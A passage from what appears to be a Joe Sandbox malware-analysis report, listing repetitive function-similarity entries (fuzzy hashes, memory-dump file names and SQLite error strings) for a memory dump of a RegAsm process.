                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1561D0766083059FC704CF68C880AABBBE4BF88744F48591DF98987352E735E945CBA2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: (join-%u)$(subquery-%u)
                                                                                                                                                                                                                                        • API String ID: 0-2916047017
                                                                                                                                                                                                                                        • Opcode ID: c1da3d029bd6c53807404affa816a86499862f5506991c594ba6293b01571fd1
                                                                                                                                                                                                                                        • Instruction ID: f372fadc3134bdb767866fa6da3dab85876fe381a8be46aa20b50bf0e81fb656
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c1da3d029bd6c53807404affa816a86499862f5506991c594ba6293b01571fd1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2551F675B043418BDB28EF24E891927B7E1BF85350F2D856DECDA4B646D631F801CB91
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C835EA
                                                                                                                                                                                                                                        • misuse, xrefs: 19C835F4
                                                                                                                                                                                                                                        • %s at line %d of [%.10s], xrefs: 19C835F9
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                                                        • API String ID: 0-3564305576
                                                                                                                                                                                                                                        • Opcode ID: 503a967cf2034220a2afcf4a79de7e3065098122255b58006cb12fd5324adaae
                                                                                                                                                                                                                                        • Instruction ID: e68c9251e35542adda88353009ea2b27cbc70f958c5bf9ec2c5965f61afa9971
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 503a967cf2034220a2afcf4a79de7e3065098122255b58006cb12fd5324adaae
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C51F8F6A00311AFCB14CF18E884A56BBA4BF04728F0D916CF8995B2A1E731E810C791
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19DC5976
                                                                                                                                                                                                                                        • misuse, xrefs: 19DC5980
                                                                                                                                                                                                                                        • %s at line %d of [%.10s], xrefs: 19DC5985
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                                                        • API String ID: 0-3564305576
                                                                                                                                                                                                                                        • Opcode ID: 6edda5984323adceed2ce9bdaefc0f2917c4f48fd9b08afc70a15940123c62c8
                                                                                                                                                                                                                                        • Instruction ID: 530b94021122ff8a2d6530250035871ca683c61e214a516d7559488bfa6cb85a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6edda5984323adceed2ce9bdaefc0f2917c4f48fd9b08afc70a15940123c62c8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F4139769083419FD710CA16CC80B9AB7E4AF84320FCC152DFC84A7681E735F994C7A2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19D1D2F7
                                                                                                                                                                                                                                        • database corruption, xrefs: 19D1D301
                                                                                                                                                                                                                                        • %s at line %d of [%.10s], xrefs: 19D1D306
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                                                        • API String ID: 0-2528248365
                                                                                                                                                                                                                                        • Opcode ID: 613237ffe3fc3980de7033f92a9a94a01db4c2f0c8cd0d38c89bbb989c1467f2
                                                                                                                                                                                                                                        • Instruction ID: 0d22ec0502c70517bc45e5d4d3c9c4f82ce98a7a9ca20c71086f6177ffd34a86
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 613237ffe3fc3980de7033f92a9a94a01db4c2f0c8cd0d38c89bbb989c1467f2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B3107B79043116FD711DA14EC00E9BBBE8EB84364F4C4839F945976A2E722F9418BA2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C853FE
                                                                                                                                                                                                                                        • database corruption, xrefs: 19C85408
                                                                                                                                                                                                                                        • %s at line %d of [%.10s], xrefs: 19C8540D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                                                        • API String ID: 0-2528248365
                                                                                                                                                                                                                                        • Opcode ID: 4b0a7b29482c5c8c04a4a7c7c80549280d21d45c0bd01c5b42b9f53177e5d606
                                                                                                                                                                                                                                        • Instruction ID: 0574bb6e3b73e9a038a72dba0838c600bb222626964de3aeae32fbeeeade1c55
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b0a7b29482c5c8c04a4a7c7c80549280d21d45c0bd01c5b42b9f53177e5d606
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72316A266447D156D7218B28F8407E6B7E19FA171AF4C44AEE4C5876CAE3A2E882C371
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • error in tokenizer constructor, xrefs: 19D67F92
                                                                                                                                                                                                                                        • no such tokenizer: %s, xrefs: 19D67F1B
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: error in tokenizer constructor$no such tokenizer: %s
                                                                                                                                                                                                                                        • API String ID: 0-815501780
                                                                                                                                                                                                                                        • Opcode ID: 9df9f78d6a89efd45837ccce6b8014ecb28d7a1f981879b48885f764e3db0746
                                                                                                                                                                                                                                        • Instruction ID: 7299cacee83c90f727fda443c71346f4575324c128604d15f08a451021e6a32e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9df9f78d6a89efd45837ccce6b8014ecb28d7a1f981879b48885f764e3db0746
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 04319E767003198FCB20CF1DD880A6AB7E4EF84665F1A456DE989DB750E732E805CB61
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • second argument to nth_value must be a positive integer, xrefs: 19C4F0C4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: second argument to nth_value must be a positive integer
                                                                                                                                                                                                                                        • API String ID: 0-2620530100
                                                                                                                                                                                                                                        • Opcode ID: 341c2311bf749db825be7c45d2d3da50f5eac98a92f47d048f0cfaff89bbdaa1
                                                                                                                                                                                                                                        • Instruction ID: 979b7d3d2b5bc2af9cb240e713bf645ada917e2fb8c9de7057bfcdf22ee93581
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 341c2311bf749db825be7c45d2d3da50f5eac98a92f47d048f0cfaff89bbdaa1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15312B76A002039BDB109F14FC4161677B0FF81720F6C8525E8E5A72C1EB22F9549692
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C852F2
                                                                                                                                                                                                                                        • database corruption, xrefs: 19C852FC
                                                                                                                                                                                                                                        • %s at line %d of [%.10s], xrefs: 19C85301
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                                                        • API String ID: 0-2528248365
                                                                                                                                                                                                                                        • Opcode ID: df0fe2a2da287535863ce335b22af1e4a047a8645c733de14fb7886096163015
                                                                                                                                                                                                                                        • Instruction ID: f8cf26c79a07c7b64b595628a122e4b4c98264c552e029fa802367d1223ee7ed
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: df0fe2a2da287535863ce335b22af1e4a047a8645c733de14fb7886096163015
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9211873B60010067CB105A59FC00CDBBFE5DFC42B6F1D4565FA8857522D623D820D3B2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C4B229
                                                                                                                                                                                                                                        • misuse, xrefs: 19C4B233
                                                                                                                                                                                                                                        • %s at line %d of [%.10s], xrefs: 19C4B238
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                                                        • API String ID: 0-3564305576
                                                                                                                                                                                                                                        • Opcode ID: 2f515726ae04a8d5a7753a0397be8ac0452dd87b26f5d3415abce92a1524a654
                                                                                                                                                                                                                                        • Instruction ID: a183065f6751ebc9d1e79c9472d810765fc15d25b7eda5da51a26bc495057d0d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2f515726ae04a8d5a7753a0397be8ac0452dd87b26f5d3415abce92a1524a654
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF1102B6700702ABD711DB28FC84E9F7BEDAFC0254F5D4428F89893252EB30E50483A2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: integer overflow
                                                                                                                                                                                                                                        • API String ID: 0-1678498654
                                                                                                                                                                                                                                        • Opcode ID: 6547fe981d0d16b702ac42b171a99866890f10a5225e62d50d9c4be5f2a68645
                                                                                                                                                                                                                                        • Instruction ID: fb8dcc499599f421073ca96ef24b428bebeae302105b868ece69e41107323951
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6547fe981d0d16b702ac42b171a99866890f10a5225e62d50d9c4be5f2a68645
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A112636E04B126BEB05AF24BC01B8637A15F13324F0D4359E4D61A1E6EB6091C4C3D6
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • JSON path error near '%q', xrefs: 19CF1F92
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
